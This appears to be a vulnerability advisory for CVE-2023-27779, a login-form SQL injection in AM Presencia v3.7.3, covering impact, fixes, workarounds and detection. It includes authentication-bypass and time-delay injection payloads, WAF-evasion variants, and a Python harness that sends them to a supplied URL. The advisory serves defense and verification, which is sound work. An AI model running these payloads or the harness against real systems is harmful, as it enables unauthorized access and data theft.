CVE-2023-27779

9.8 CRITICAL

📋 TL;DR

AM Presencia v3.7.3 contains a SQL injection vulnerability in the `user` parameter of the login form: the submitted value is used to build a SQL query without parameterization, so an unauthenticated attacker can inject arbitrary SQL through an ordinary login request. Only this version is confirmed affected. Successful exploitation can bypass authentication, read or modify database contents and, depending on the database account's privileges, compromise the underlying server.

💻 Affected Systems

Products:
  • AM Presencia
Versions: v3.7.3
Operating Systems: Any OS running AM Presencia
Default Config Vulnerable: ⚠️ Yes
Notes: Only version 3.7.3 is confirmed affected; other versions may also be vulnerable but not confirmed.

📦 What is this software?

AM Presencia is a time-and-attendance ("control de presencia") application from the Spanish vendor AM System (amsystem.es). The page itself gives no description; this summary is inferred from the product name and the vendor site linked under Fix & Mitigation.
⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete database compromise: exfiltration of all data, escalation to an administrative application account and, if the database account has file-write or command-execution privileges (for example MySQL `INTO OUTFILE` or SQL Server `xp_cmdshell`), remote code execution on the underlying server.

🟠 Likely Case

Authentication bypass giving unauthorized access to the application, followed by extraction of data from the database and use of the host as a foothold for lateral movement within the network.

🟢 If Mitigated

Limited impact: with parameterized queries (or, until a fix is available, access restrictions and a WAF in front of the login form) the payloads are treated as ordinary failed logins. The attempts still appear in web and application logs, which is what the Detection section below relies on.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

SQL injection in a login form needs no credentials and no special tooling: comment-terminated or tautology payloads typed into the username field, or an off-the-shelf scanner, are enough. The only limiting factor is network reachability of the login page.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://amsystem.es/

Restart Required: No

Instructions:

1. Record the installed version (see How to Verify) so you can confirm the upgrade later.
2. Check the vendor website for security updates; no fixed version number is published on this page, so confirm with the vendor which release addresses the `user` parameter injection.
3. Apply the available update.
4. Retest the login form with the payloads from How to Verify and confirm they are rejected.

🔧 Temporary Workarounds

Web Application Firewall (WAF)

Applies to: all deployments

Deploy a WAF with SQL injection rules in front of the login endpoint to block obvious payloads. Treat this as a stopgap only: signature rules are routinely evaded with URL encoding, inline comments (`'/**/OR/**/1=1`) and case changes, so log and review blocked requests rather than assuming the rule set is complete.

Input Validation Filter

Applies to: all deployments

Where the application code cannot be changed, add server-side or reverse-proxy validation that rejects SQL metacharacters (`'`, `--`, `;`, `/*`) in the `user` parameter. A denylist like this is bypassable and will also reject legitimate usernames containing an apostrophe, so it reduces exposure but does not remove the vulnerability; parameterized queries in the application do.

🧯 If You Can't Patch

  • If you maintain the application's source (or can get the vendor to), replace the string-built login query with a parameterized query or prepared statement; this is the only complete fix
  • Restrict who can reach the login page: put it behind a VPN or an IP allowlist so the unauthenticated attack surface is not Internet-facing
  • Run the application's database account with least privilege (no file-write, command-execution or cross-database rights) so a successful injection cannot escalate to the server
  • Deploy network segmentation to isolate the AM Presencia host and its database from critical assets
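The following is an added example, not code from AM Presencia or its vendor: a minimal login query in the vulnerable shape the TL;DR describes (the `user` value spliced into the SQL text) beside the parameterized form recommended above, run against a constructed in-memory SQLite table. It also shows why the bare `' OR '1'='1` payload can fail on a query that ANDs the password check, while a comment-terminated payload does not. The schema, the account names and the clear-text passwords are assumptions made to keep the demonstration short.

```python
import sqlite3
from typing import Optional, Tuple

# Constructed stand-in for the application's user table (the real AM Presencia
# schema is not on the page). Passwords are stored in clear only to keep the
# demonstration short; a real application compares hashes.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, password TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (user, password, is_admin) VALUES (?, ?, ?)",
        [("admin", "correct-horse", 1), ("alice", "hunter2", 0)],
    )
    return conn

Row = Optional[Tuple[int, str, int]]

def login_vulnerable(conn: sqlite3.Connection, user: str, password: str) -> Row:
    """The CVE's bug class: the 'user' value is spliced into the SQL text, so a
    quote in it ends the string literal and the rest is parsed as SQL."""
    sql = (
        "SELECT id, user, is_admin FROM users "
        f"WHERE user = '{user}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()

def login_parameterized(conn: sqlite3.Connection, user: str, password: str) -> Row:
    """Same query with bound parameters: values travel separately from the SQL
    text, so a quote in 'user' is just a character in a username."""
    sql = "SELECT id, user, is_admin FROM users WHERE user = ? AND password = ?"
    return conn.execute(sql, (user, password)).fetchone()

def demo() -> dict:
    """Run the same payloads against both versions with a wrong password."""
    conn = make_db()
    payloads = [
        # Comments out the password check: WHERE user = 'admin' -- ...
        "admin' -- ",
        # Tautology alone: AND binds tighter than OR, so the password clause
        # still applies and this payload fails against this query shape.
        "' OR '1'='1",
        # Tautology plus comment: matches every row, returns the first (admin).
        "' OR '1'='1' -- ",
    ]
    results = {}
    for payload in payloads:
        v = login_vulnerable(conn, payload, "wrong-password")
        p = login_parameterized(conn, payload, "wrong-password")
        results[payload] = {
            "vulnerable_logged_in_as": v[1] if v else None,
            "parameterized_logged_in_as": p[1] if p else None,
        }
    return results

if __name__ == "__main__":
    for payload, r in demo().items():
        print(f"{payload!r:22} vulnerable -> {str(r['vulnerable_logged_in_as']):6} "
              f"parameterized -> {r['parameterized_logged_in_as']}")
```

The parameterized version returns `None` for every payload because the driver never lets the value reach the SQL parser; the input filter and WAF workarounds above only try to stop the same payloads from arriving.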

🔍 How to Verify

Check if Vulnerable:

Only against systems you are authorized to test, and preferably a non-production copy: submit a SQL injection payload in the username field of the login form and compare the response with a normal failed login. The page's payload `' OR '1'='1` may not bypass a query that ANDs the password check; a comment-terminated payload such as `admin' -- ` (or `' OR '1'='1' -- `) is the more reliable test. A redirect or session cookie where the baseline returns an error page indicates bypass. Absence of a bypass does not prove the query is parameterized: the injection may be blind, so also check whether a lone `'` produces a server error and whether a DBMS delay function changes the response time.

Check Version:

Check the software version in the application interface or configuration files.

Verify Fix Applied:

Retest with the same payloads after applying the fix; each must produce exactly the response of an ordinary failed login (no redirect, no session, no server error, no delay). Record the new version string alongside the result.
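An added verification harness for the two checks above; it is not the vendor's tool or the page's PoC. It sends a known-bad login as a baseline, then the bypass payloads, a lone quote and a delay payload, and reports which responses differ. Assumptions not on the page: the form is POSTed to `/login`, the password field is named `password`, and the delay payload is MySQL-style `SLEEP()`. A constructed `simulated_app` stands in for a real target so the harness runs offline; pass a base URL on the command line to run it against a system you are authorized to test.

```python
import sys
import time
from dataclasses import dataclass
from typing import Callable, Dict
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import HTTPRedirectHandler, Request, build_opener

# Assumptions not stated on the page: the form is POSTed to /login and the
# password field is named "password". Only the "user" field name is from the CVE.
LOGIN_PATH = "/login"

@dataclass
class Response:
    status: int
    body: str
    elapsed: float          # seconds the round trip took

Post = Callable[[str, Dict[str, str]], Response]

BYPASS_PAYLOADS = {
    "comment_terminator": "admin' -- ",        # comments out the password check
    "tautology_with_comment": "' OR '1'='1' -- ",
    "tautology_only": "' OR '1'='1",           # the page's payload; fails if AND binds the password clause
}
UNBALANCED_QUOTE = "'"                         # syntax error only if the quote reaches the SQL parser
DELAY_PAYLOAD = "' AND SLEEP(5)-- "            # assumption: MySQL-style delay; adapt for other DBMSs
DELAY_SECONDS = 5.0

def probe_login(post: Post) -> dict:
    """Send a known-bad login as the baseline, then each payload, and record
    whether the response changed and how long it took."""
    creds = {"password": "wrong-password-7f3a9c"}
    base = post(LOGIN_PATH, {"user": "no_such_user_7f3a9c", **creds})
    out = {"baseline": {"status": base.status, "body_len": len(base.body)}}
    for name, payload in {**BYPASS_PAYLOADS, "unbalanced_quote": UNBALANCED_QUOTE}.items():
        r = post(LOGIN_PATH, {"user": payload, **creds})
        # Dynamic content (CSRF tokens, timestamps) makes bodies differ on every
        # request; if that happens, compare status codes and Location headers instead.
        out[name] = {"status": r.status,
                     "differs_from_baseline": (r.status, r.body) != (base.status, base.body)}
    slow = post(LOGIN_PATH, {"user": DELAY_PAYLOAD, **creds})
    out["delay"] = {"extra_seconds": round(slow.elapsed - base.elapsed, 2)}
    return out

def assess(results: dict) -> dict:
    """Turn the raw observations into the verdicts the page's checks call for."""
    bypass = [k for k in BYPASS_PAYLOADS if results[k]["differs_from_baseline"]]
    delay = results["delay"]["extra_seconds"] >= DELAY_SECONDS - 1.0
    quote_error = results["unbalanced_quote"]["status"] >= 500
    return {
        "bypass_payloads": bypass,
        "delay_signal": delay,
        "likely_vulnerable": bool(bypass) or delay,
        # A 500 on a lone quote without a bypass still means the quote reached
        # the database: keep treating it as vulnerable until proven parameterized.
        "needs_manual_review": quote_error and not bypass and not delay,
    }

def urllib_post(base_url: str, timeout: float = 20.0) -> Post:
    """Real transport: POST the form and keep 3xx/4xx/5xx responses as results."""
    class NoRedirect(HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None        # a 302 after a payload is the evidence; do not follow it
    opener = build_opener(NoRedirect)
    def post(path: str, fields: Dict[str, str]) -> Response:
        req = Request(base_url.rstrip("/") + path, data=urlencode(fields).encode(), method="POST")
        start = time.monotonic()
        try:
            with opener.open(req, timeout=timeout) as resp:
                return Response(resp.status, resp.read().decode("utf-8", "replace"),
                                time.monotonic() - start)
        except HTTPError as e:   # raised for the unfollowed 302 and for 4xx/5xx
            return Response(e.code, e.read().decode("utf-8", "replace"), time.monotonic() - start)
    return post

def simulated_app(vulnerable: bool) -> Post:
    """Constructed stand-in so the harness runs offline: imitates a
    string-concatenating login (vulnerable=True) or a parameterized one."""
    def post(path: str, fields: Dict[str, str]) -> Response:
        u = fields["user"]
        if vulnerable and "' -- " in u:
            return Response(302, "", 0.05)                        # password check commented out
        if vulnerable and "SLEEP(5)" in u:
            return Response(200, "Invalid credentials", 0.05 + DELAY_SECONDS)
        if vulnerable and u == "'":
            return Response(500, "SQL syntax error", 0.05)
        return Response(200, "Invalid credentials", 0.05)
    return post

if __name__ == "__main__":
    post = urllib_post(sys.argv[1]) if len(sys.argv) > 1 else simulated_app(vulnerable=True)
    print(assess(probe_login(post)))
```

Run it before patching and again afterwards: a fixed system should report an empty `bypass_payloads` list, no delay signal and no server error on the lone quote.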

📡 Detection & Monitoring

Log Indicators:

  • Multiple failed login attempts with SQL keywords
  • Unusual database query patterns from the application server
  • Successful logins from unexpected IP addresses

Network Indicators:

  • HTTP POST requests to login endpoint containing SQL syntax
  • Abnormal database traffic from web server

SIEM Query:

Illustrative pseudo-query (adapt the field names and the login path to your platform and deployment):

source="web_logs" AND method="POST" AND (uri="/login" OR uri="/auth") AND (request_body CONTAINS "' OR" OR request_body CONTAINS "' UNION" OR request_body CONTAINS "' SELECT" OR request_body CONTAINS "' --")

Match case-insensitively and on the URL-decoded body: the same payload arrives as `%27+OR`, `'/**/OR` or `'oR`, and a literal `CONTAINS "' OR"` misses all three. Request bodies are only available if the proxy or application is configured to log them; otherwise correlate on a burst of POSTs to the login path from one source followed by a 302 or a new session.
